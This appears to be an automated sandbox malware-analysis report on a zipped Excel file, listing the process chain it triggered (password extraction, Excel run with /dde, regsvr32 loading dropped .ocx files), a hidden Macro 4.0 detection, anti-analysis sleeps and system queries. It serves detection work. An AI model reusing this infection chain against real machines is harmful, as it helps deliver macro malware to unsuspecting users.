Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\xpo14wsl.qhu" "C:\Users\user\Downloads\rerumvel-6647201.zip Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xpo14wsl.qhu\favor-2069844189.xls Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /dde Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_01
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-619FD9CB-1A5C.pma Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\8be7b269-f603-41e6-b4ce-f049d9c78bf5.tmp Jump to behavior
Source: classification engine Classification label: mal52.expl.win@50/262@7/10
Source: C:\Windows\SysWOW64\cmd.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 6_2_00C82A18 push ecx; ret 6_2_00C82A1A
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 6_2_00C82A91 push edi; ret 6_2_00C82A92
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 6_2_00C829E8 push ecx; ret 6_2_00C829EA
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 6_2_00C82A24 push eax; ret 6_2_00C82A3E
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 6_2_00C82AE5 push edi; ret 6_2_00C82AE6
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6400 Thread sleep count: 178 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6400 Thread sleep time: -89000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Code function: 6_2_00C8B042 GetSystemInfo, 6_2_00C8B042
Source: C:\Windows\SysWOW64\unarchiver.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\xpo14wsl.qhu\favor-2069844189.xls, type: DROPPED
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\xpo14wsl.qhu" "C:\Users\user\Downloads\rerumvel-6647201.zip Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xpo14wsl.qhu\favor-2069844189.xls Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /dde Jump to behavior
Source: unarchiver.exe, 00000006.00000002.584717006.0000000001340000.00000002.00020000.sdmp, cmd.exe, 0000000C.00000002.585009224.0000000003C20000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: unarchiver.exe, 00000006.00000002.584717006.0000000001340000.00000002.00020000.sdmp, cmd.exe, 0000000C.00000002.585009224.0000000003C20000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: unarchiver.exe, 00000006.00000002.584717006.0000000001340000.00000002.00020000.sdmp, cmd.exe, 0000000C.00000002.585009224.0000000003C20000.00000002.00020000.sdmp Binary or memory string: Progman
Source: unarchiver.exe, 00000006.00000002.584717006.0000000001340000.00000002.00020000.sdmp, cmd.exe, 0000000C.00000002.585009224.0000000003C20000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior